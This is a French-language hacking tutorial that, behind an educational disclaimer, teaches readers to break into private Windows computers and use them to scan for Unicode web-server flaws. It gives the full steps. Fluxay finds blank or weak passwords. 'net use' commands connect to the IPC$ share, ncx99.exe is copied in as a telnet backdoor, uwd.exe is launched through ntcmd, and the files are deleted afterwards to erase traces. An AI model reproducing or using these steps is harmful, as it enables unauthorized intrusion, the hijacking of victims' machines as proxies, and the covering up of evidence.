Important : Ce tutorial a été crée dans le seul but de vous protéger des dangers que représente l'utilisation de cette technique, en aucun cas, AloneTrio, son hébergeur et moi ne pouvant etre tenus pour coupable.

</DISCLAMER>

[Comment trouver des failles unicodes sans prendre ( trop ) de risques par Poulpatine]

La lecture de cette publication electronique implique la lecture de ce disclaimer. Ce texte est fourni au lecteur à titre
purement éducatif et informatif et non dans le but de montrer comment utiliser certaines techniques.
En aucun cas l'auteur n'incite ce dernier au non respect de la loi, sous toute forme
qu'il soit. Aucune poursuite ne pourra être faire contre l'auteur de ce texte ou toute personne citée dans ce texte.
Si vous n'êtes pas d'accord avec ces consignes, ne lisez pas ce qui va suivre.


Ce qu'on va faire, en gros, c'est de se connecter chez des particuliers pour lancer le scan de chez eux :) .

Pour suivre la technique décrite dans le tuto suivant, vous aurez besoin de :

-Fluxay
-NCX99.exe
-UWD.exe ( ou bien la version 2 comme vous voulez, c pareil )
-NTCMD.exe
-2 mains quoique une seule suffirait
-1 oeil ( comme pour les mains )
-0 pieds ou 1 ou 2 voire plus ( dtf ca sert pas trop )

Si vous n'avez pas ces outils, cherchez les sur google, vous les trouverez trés rapidement ( http://www.google.fr)

Et maintenant, au boulot, donc vous venez de télécharger Fluxay et vous ne savez pas vous en servir:-/ . Pas de
panique, je vais vous dire comment s'en servir dans le cas présent.
-Installez le (pas trop dur je pense)
-Lancez le ( ça non plus c pas dur)
-Il vous demande une clé, mettez y n'importe quoi ( eheheh )
-Vous vous retrouvez devant FLuxay et vous ne comprenez rien, ce n'est pas grave, ca va venir.
-Faites File - Advance Scan Wizard ( pour lancer l'assistant avancé de scan ) ou bien faites ctrl + W pour aller
plus vite.
-Une fois cela fais, vous vous retrouvez devant une petite fenetre avec les champs Start IP, End IP, Target Os,
2 cases à cocher et une liste avec les différents protocoles à scanner.
-Dans Start IP, mettez la première IP de la plage d'ip que vous voulez scanner
-Dans End IP, devinez, je le marque à l'envers. Suov zettem al erèinred PI ed al egalp euq suov zeluov rennacs.
Vous mettez la dernière IP de la plage que vous voulez scanner
-Target OS, vous ne touchez rien car de toute façon les cibles seront des machines Win.
-Les 2 cases vous ne les touchez pas non plus, cela ne nous sers pas.
-Dans la liste de protocoles, vous décochez tout sauf IPC.
-Voila, now vous faitez Suivant.


Le scan va se lancer, il faut attendre un peu, bien que la durée de l'attente dépende du nombre d'IPs que vous avez
choisis de scanner.
-Une fenetre avec des résultats en vert sur un fond noir va s'ouvrir, elle correspond aux IP qui représentent une
connection potentielle. Avec ces adresses, le programme va tenter de determiner les ressources partagées, les
différents utilisateurs du Pc. Une fois ces utilisateurs définis, le programme ( Fluxay, toujours le même ) va tenter
de trouver les mots de passe ui seraient utilisés par les utilisateurs. IL va essayer des mots de passe du genre de
1234, le nom du compte ( si votre compte est Poulp, il testera Poulp comme mot de passe) etc... Cela vous montre quels
sont les pass à ne pas utiliser sur votre système :D .
Bon, si tout s'est bien passé, vous vous retrouvez avec, en bas de l'écran, une liste de noms d'utilisateur ainsi que
leurs mots de passe à coté ( si il y a marqué (NULL), c'est pas pour se moquer de vous mais plutot pour dire qu'il n'y
a pas de pass ) et un peu plus loin l'adresse IP de l'ordinateur à qui correspondent ces informations.
Si rien n'est apparu en bas, cela veut dire que vous n'avez pas trouvés de cibles valides, essayez en scannant une autre plage
d'IPs ou bien en en scannant une plus grande.
Ben, eh bien une fois que vous êtes munis de ces informations, on va pouvoir commencer à rentrer sur un de ces
ordinateurs. Pour cela faites démarrer exécuter et tapes CMD, cela lançera une fenêtre de commandes dos. Tout d'abord
placez vous dans le repertoire où vous avez mis vos outils, je vous conseille un repertoire assez rapide à accéder
pour éviter de se taper tout le chemin, dans mon cas j'ai mis c:\net.
-Vous faites démarrer éxécuter CMD puis cliquez sur OK.
-Rentrez dans le repertoire ou vous avez vos outils ( dans mon cas, j'ai juste à taper cd net).
Maintenant, on va tenter de se connecter à un des ordinateurs dont vous avez le login et le pass.
-Tapez : net use \\IP_CIBLE\IPC$ "" "/user:Administrateur"
Pour ce cas là, il n'y a pas de mot de passe donc vous ne mettez rien entre les 2 premiers guillemets ( "" )
et le nom d'utilisateur est Administrateur.
Si le nom d'utilisateur est Poulp est le mot de passe 12345 vous aurez à taper:
net use \\IP_CIBLE\IPC$ "12345" "/user:Poulp"
Si l'ip de la cible, est, au hasard, 127.0.0.1 ( ne testez pas avec ça, ca servirait à rien) vous taperez
net use \\127.0.0.1\IPC$ "12345" "/user:Poulp"
C'est bon, vous avez compris ? :D Je sais pas trop comment faire plus simple...
Vous devriez voir s'afficher "La commande s'est terminée correctement", si cela n'est pas le cas, regardez si vous n'avez
pas fais de fautes en tapant la commande, et si malgré tout, il y a encore des erreurs, essayez avec une autre IP.

Voila, on en est au point ou vous avez réussi à obtenir la phrase "La commande s'est terminée correctement".\o/ BRAVO \o/
mais le boulot n'est pas fini...
Maintenant on va envoyer les fichiers qui nous interessent sur l'ordinateur distant. On prends toujours la même cible 127.0.0.1 .
Vérifiez que vous êtes bien dans le repertoire dans lequel figurent les fichiers à envoyer.
Tout d'abord on va envoyer ncx99.exe dans un repertoire un peu plus discret que la racine du C:, tout cela
par la commande DOS copy.
-Tapez: copy ncx99.exe \\IP_CIBLE\c$\winnt\system32
Cette commande aura pour but de copier le fichier ncx99.exe dans le repertoire c:\winnt\system32\ de l'ordinateur ciblé.
Si vous aviez tapés copy ncx99.exe \\IP_CIBLE\c$ cela aurait copié ncx99.exe dans la racine du C: de l'ordinateur ciblé.
Si la commande s'est bien passée vous devriez voir " 1 fichier(s) copié(s).", si tel n'est pas le cas, vérifiez que vous
êtes bien dans le repertoire où se trouve ncx99.exe ou bien alors vérifiez la commande.

Bon, c'est cool, vous avez uploader un fichier sur le système cible, mais maintenant que faire, et oui, à quoi sert ce fichier,
en quoi cela a t-il un rapport avec le scan de failles unicode que je veux faire, quelle est la couleur du cheval blanc
d'Henri IV, est ce que si je met mon slip sur mon pantalon je ressemblerai à Superman ??? Eh bien, je vais répondre
à certaines de vos questions, mais pas toutes, chuis pas Madame Soleil non plus ... OH Eh =) .
En fait le fichier nvx99.exe à pour but d'ouvrir, sur le systeme sur lequel il est lancé, un serveur telnet sur le port
99. Ce serveur telnet vous permet, si vous vous y connecter avec un client telnet, d'éxécuter certaines commandes sur
la cible.
Bon, on a uploadés le serveur telnet, c'est bien beau, mais on a pas encore fini l'upload, maintenant on va uploader le
scanneur de failles. C'est quasiment la même commande que pour le serveur ( ncx99.exe ), seul le nom du fichier change.

-Tapez: copy uwd.exe \\IP_CIBLE\c$\winnt\system32 . Si vous avez bien lus ce qui est décrit un peu plus haut, vous n'aurez
pas besoin que je vous décrive cette commande, sinon tant pis pour vous, chuis pas Mère Thérésa non plus ... =)
Vous devriez voir " 1 fichier(s) copié(s).", si tel n'est pas le cas, procédez aux mêmes vérifications que tout à
l'heure, soit, vérifier si la commande est bien tapée et si vous vous trouvez bien là ou se trouve le fichier uwd.exe.

Bon, eh ben ca commence à prendre forme, on a réussi à uploader 2 fichiers, c'est cooooool :) .
On va maintenant se servir du programme ntcmd.exe, en effet ce programme permet de lancer un processus sur une machine distante.
En gros, avec ça on va lancer un programme sur l'ordinateur ciblé:
-Vérifiez que vous etes bien dans le repertoire où se trouve ntcmd.exe.
-Lancez le en tapant ntcmd.
vous devriez voir s'afficher NTCmd <\\IP> <-U:UserName> <-P:Password>
Ca nous permet de voir les commandes de lancement du programme. On va reprendre notre exemple avec l'IP 127.0.0.1, le nom Poulp et
le mot de passe 12345.
-Vous devriez donc taper ntcmd \\127.0.0.1 -U:Poulp -P:12345, si il n'y pas pas de mot de passe, tapez
ntcmd \\127.0.0.1 -U:Poulp -P:"" .
Là vous vous retrouvez avec NTCMD>
Tapez y ncx99 afin de lancer le serveur telnet qui s'appelle ncx99.exe.
Tadaaaaam, c'est magique, maintenant on a un serveur telnet installé sur la machine cible !!! Mais maintenant les enfants, il faut
s'y connecter !!! Pour celà vous aurez besoin de .. de .... un client telnet et oui !!! bravo :D :D :D .
Si vous n'en avez pas, ne vous en faite pas, en fait vous en avez un, il est livré avec windows, et oui, c'est trop bien =) .
Donc, revenons à notre fenetre DOS, lancez en une autre par éxecuter, CMd puis OK .
-Tapez telnet.
-Tapez ensuite open.
-Puis encore ensuite tapez l'adresse ip de la cible ( dans notre cas 127.0.0.1 ) suivi de : et du numéro de port à atteindre.
Dans notre cas cela nous donnera :
127.0.0.1:99.

Là vous vous retrouvez devant un écran où vous ne comprenez rien, c'est pas grave, ca va venir :) . Je connais pas grand chose du telnet
mais pour ce que j'en connais, ca ressemble un peu au DOS. Avec des commandes telles que dir ( pour voir l'intérieur d'un repertoire ) cd
( pour rejoindre un repertoire ) del ( pour supprimer des fichiers ) et type ( pour voir le contenu d'un document .txt ) .
Donc, là en fait on se retrouve avec certains droits sur la machine, mais ce qui nous interesse ( enfin, ce pour quoi j'ai écrit ce tuto )
c'est de scanner des serveurs pour trouver des failles unicode. Donc, il va falloir lancer le scanner de failles uwd.exe .
Pour cela, c'est tout simple, :
-Tapez uwd "IP_départ" "IP_fin" Votre_nick Votre_pass
du genre de:
uwd 127.0.0.1 127.0.0.255 Nioubi monpass.

Cette commande aura pour but de lancer un scan de failles unicode sur les machines sur les IPs 127.0.0.1 à 127.0.0.255, donc en comptant
toutes les adresses intermédiaires ( 127.0.0.2 127.0.0.3 127.0.0.4 ....... 127.0.0.253 127.0.0.254 ) . Bien que le scanner soit rapide
, cela ne se fais pas instantanément, je vous conseille donc de vous deconnecter de la machine sur laquelle est lancé le programme de scan,
et cela pour des raisons de sécurité ( enfin c'est ce que je fais moi ). Si vous vous deconnectez de la machine, pour vous reconnecter vous
devrez relancer le programme ntcmd afin de remettre en route le serveur Telnet.

Bon, admettons que le scan soit en marche, vous vous déconnectez, vous allez faire une partie de foot par exemple, ou bien vous allez vous acheter
des chaussures, enfin ce que vous voulez ( tant que c'est légal, hein ? :-P ).
Vous revenez en pensant que le scan est terminé, vous reprennez à l'étape ou vous devez lancer le serveur telnet sur la machine grace au programme
NTCMD.exe . Vous vous connectez par telner sur la machine et vous voulez récupérer les résultats de vos scans. Pas de problèmes, vous n'avez qu'à
taper "type uwd.txt" dans votre client telnet et vous verrez apparaitre les résultats du scanner qui auront été consignés dans uwd.txt par le programme
lui même.
Voila, c'est cool, vous avez les résultats de vos scans, et vous n'aurez même pas pris de risques en les scannant vous mêmes :D :D :D \o/ .
Mais maintenant, il faudrait effacer les programmes qu'on a uploadé.
Pour cela rien de plus simple ( enfin presque rien ) :
-Lancez encore une fois le prompt Dos par " Démarrer ==> Exécuter ==> cmd "

Une fois là, vous allez voir, c'est du dos, c pas dur
On veut effacer les fichiers qu'on a uploadés, on va donc, se servir de la commande del.
- Faites dir \\IP_CIBLE\C$\winnt\system32 ( si les fichiers que vous avez uploadés sont dans c:\winnt\sytem32\ sinon faites un dir vers le repertoire où
sont vos fichiers. A partir de là vous pouvez voir si il y a vos fichiers dans le repertoire ou pas.
- Faites ensuite del \\IP_CIBLE\C$\WINNT\SYSTEM32\uwd.exe
Cela aura pour but de supprimer le fichier uwd.exe se trouvant dans le repertoire c:\winnt\system32
Répétez ensuite la commande pour ncx99.exe mais aussi pour le .txt crée par uwd.exe (uwd.txt) Mais avant cela, vérifiez que vous avez bien récoltés les
informations contenues dans uwd.txt, si vous vous êtes servis du telnet pour prendre les informations contenues dans uwd.txt, vous n'avez pas besoin de
taper la commande suivante qui servira à copier le fichier uwd.txt de la machine cible vers votre ordinateur.
- copy \\IP_CIBLE\C$\WINNT\SYSTEM32\uwd.txt c:\
Avec ça vous devriez retrouver le fichier où sont contenus les résultats du scan à la racine de votre disque dur C: .

Une fois que vous avez bien pris les infos ( ce serait con de scanner pour rien, hein ? =) ) vous pouvez enlever le reste des traces.
Ces traces sont ncx99.exe ( le serveur telnet ) et uwd.txt ( le log de uwd.exe ). Faites cela par les commandes suivantes :

- del \\IP_CIBLE\C$\WINNT\SYSTEM32\ncx99.exe et
del \\IP_CIBLE\C$\WINNT\SYSTEM32\uwd.txt .
Et voila, c'est bon, on a des joulis scans de failles unicode pour faire plein de trucs ( mais toujours légaux ) du genre de prévenir les admins de ces serveurs
afin qu'ils bouchent les failles =) . Et ui, les serveurs de chez Microsoft, c'est pire que du gruyère :-/ . Mais bon, ca permet de se faire la main pour
passer à des plus gros morceaux plus tards ( moi j'en suis encore à me faire la main aussi :) ) .

J'espere que ce tutorial vous aura plus, et que vous aurez éprouvés autant de plaisir à le lire que moi à l'écrire, je voudrais aussi remercier tout plein de monde
comme Xion,turkattak ( qui sont de la team Immortal-hack dispo sur http://www.immortal-hack.com)
Mais aussi Alonetrio pour son scanner uwd :) .
Et pis un remerciement @ tous ceux qui me reconnaitront :) .
Mais aussi et sans oublier tous ceux que j'ai oublié et pour lesquels je suis désolé de les avoir oubliés :-/ . ( Wow, matez la phrase de fous quand même ) ...


Poulpatine